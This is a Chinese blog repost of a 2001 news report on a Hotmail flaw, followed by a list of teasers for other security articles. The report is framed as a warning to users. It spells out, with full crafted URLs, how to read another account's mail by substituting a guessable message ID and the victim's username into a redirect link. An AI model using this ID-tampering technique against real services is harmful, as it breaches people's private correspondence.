Hotmail发现严重安全漏洞

原创 2001年08月23日 09:57:00
近日,一位Hotmail用户发现,通过简单的更改地址中的邮件编号等信
息就可以浏览它人的邮件内容。由于邮件编号都有一定的规则,所以很容
易猜出来。要完成此项工作,你必须拥有2个Hotmail信箱。
  
  用于偷看他人邮件的地址为:
  
  http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd? _lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%
2fgetmsg&hm___qs=%26msg%3dMSGXXXXXXXXX% 2e(X)X%26start%3d1% 26len%3d99999999999%26login%
3dUSERNAME%26domain%3dhotmail%2ecom
  其中XXXXXXXXX为邮件编号,USERNAME为用户账号,(X)X为介于0和59
之间的第二编码。
  
  比如说,你有一个名为r00tarded@hotmail.com的信箱。首先登录此信
箱,打开任何一封邮件,此时地址栏中的地址将是:
  
  http://lw2fd.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&a=5691b2b4e104176111971aa0fbb1274&msg=MSG998000947.3&start=197078&len=1060&msgread=1&mfs=182

  这封电子邮件的编号就是MSG998000947.3。把地址拷贝下来,注销。
然后登录另一个信箱。把刚才的那封邮件的编号和账号插入地址栏:
  
  http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998000947%2e3%26start%3d1%26len%3d99999999999%26login%
3dr00tarded%26domain%3dhotmail%2ecom
  回车。看到什么了?对,r00tarded@hotmail.com中的那封邮件的内容

  
  提请广大Hotmail用户注意,此漏洞到本站发稿时为止仍未修复。(张
永刚)
  (责编:Cathy)

OpenSSL严重安全漏洞CCS

继之前openSSL爆出的“心脏出血”漏洞后,
  • jinjiaoooo
  • jinjiaoooo
  • 2014年06月09日 23:09
  • 804

udev:Linux里严重的本地安全漏洞

转自:http://www.ha97.com/1002.html 经过验证,我个人认为udev的漏洞是linux有史以来最危险的本地安全漏洞,通杀X86和X64架构下N个发行...
  • qdujunjie
  • qdujunjie
  • 2015年03月25日 12:20
  • 1436

通过 JavaMail 访问 Hotmail 邮箱(hotmail不提供smtp和pop3服务)

简介: 相信许多人都有 MSN 聊天工具的帐号,例如 abc@hotmail.com ,这个账号其实也是一个邮件地址,可以进行正常的邮件收发功能,你可以通过网址 http://www.hotmail....
  • dac55300424
  • dac55300424
  • 2013年08月12日 11:32
  • 11582

Fastjson存在远程代码执行高危安全漏洞

Fastjson安全漏洞通告
  • LC_shandow
  • LC_shandow
  • 2017年03月17日 19:14
  • 1947

Apache Tomcat全系再曝严重安全漏洞

Apache Tomcat全系产品再次爆出严重的安全漏洞,其中包括2个DoS漏洞和3个信息泄露漏洞。   1.  CVE-2014-0095:DoS(拒绝服务)漏洞  如果AJP请求...
  • tuna_lxg
  • tuna_lxg
  • 2014年05月29日 11:24
  • 766

CentOS下Bash严重安全漏洞修复方案

日前Linux官方内置Bash中新发现一个非常严重安全漏洞(漏洞参考https://access.redhat.com/security/cve/CVE-2014-6271 ),黑客可以利用该Bash...
  • u010734727
  • u010734727
  • 2014年10月21日 07:32
  • 337

邮件协议POP3/IMAP/SMTP服务的区别 常用邮箱的 IMAP/POP3/SMTP 设置

通过网上查找的资料和自己的总结完成了下面的文章,看完之后相信大家对这三种协议会有更深入的理解。如有错误的地方望指正。 POP3   POP3是Post Office Protocol 3的简称,即邮...
  • a2241076850
  • a2241076850
  • 2016年09月22日 18:06
  • 16493

Bug的缺陷的优先级和严重程度

在软件测试中,软件缺陷的严重性的判断应该从软件最终用户的观点做出判断,即判断缺陷的严重性要为用户考虑,考虑缺陷对用户使用造成的恶劣后果的严重性。      优先级是表示处理和修正软件缺陷的先后顺序的...
  • yao150824
  • yao150824
  • 2015年10月19日 17:08
  • 606

网络安全-常见漏洞与分析

一、SQL注入 (1)注入产生原理 使用用户输入的参数拼凑SQL语句,用户对服务器端代码里的SQL语句可控,使服务器执行恶意的sql命令 http://bbs.pconline.com.cn/topi...
  • happydream_C
  • happydream_C
  • 2016年11月21日 11:31
  • 1354

(转)常见Web安全漏洞

原文链接:http://www.ibm.com/developerworks/cn/web/1012_weiqiang_webattack/   简介: Web 安全问题,很多时候会被程序...
  • u014538198
  • u014538198
  • 2014年11月29日 16:55
  • 1849
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:Hotmail发现严重安全漏洞
举报原因:
原因补充:

(最多只允许输入30个字)